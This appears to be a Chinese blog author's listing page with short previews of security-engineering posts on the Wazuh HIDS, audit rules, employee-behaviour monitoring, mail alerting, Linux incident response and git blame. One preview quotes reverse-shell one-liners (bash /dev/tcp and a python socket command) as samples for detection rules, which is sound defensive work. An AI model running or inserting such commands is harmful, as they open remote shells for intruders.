發簡信
IP屬地:寧夏
-
安全工程師如何快速適應新企業及一些新員工感悟
加入MT剛好3個月整,來記錄一些自己的發現和感悟。 入職第一周-如何快速進入工作狀態 和所有新人一樣,公司的新人培訓計劃提供了很多了解公司以及如...
-
Wauzh原理簡析及audit規則風險評估
HIDS基本原理 熟悉HIDS的朋友應該了解,服務器的shell監控一般有兩種,一種依靠Linux的audit審計功能,比如Wazuh,一種是重...
-
企業安全-淺談員工行為監控
我目前就職于一家私企的安全部,主要做安全審計的工作,很多公司的離職流程沒有考慮過員工的異常行為審計,18年我在逛微博的時候看到google的一條...
-
Wauzh自定義反彈shell告警規則常見反彈: bash -i >& /dev/tcp/ip/port0>&1 python -c"import os,socket,subproc...
-
Wazuh配置使用騰訊企業郵箱告警
測試環境: CentOS Linux release 7.6.1810 Wazuh 3.10.2 1、wazuh服務器上安裝postfii及相關...
-
開源HIDS-Wauzh功能測試一、Wazuh 守護進程及工具進程 守護進程 ossec-agentd https://documentation.wazuh.com/3.10...
-
開源HIDS-Wauzh測試使用
Wazuh簡介 前端時間調研了一些HIDS的開源系統: https://github.com/Neo23x0/Fenrir更加方便(不需要安裝代...
-
應急響應-Linux應急排查手冊
賬號排查 grep :0: /etc/passwd #檢查是否產生了新用戶,和UID、GID為0的用戶 stat /etc/passwd #檢查...
-
git blame使用
命令名稱: git-blame - 顯示文件的每一行最后修改的版本和作者 用法: git blame [-c] [-b] [-l...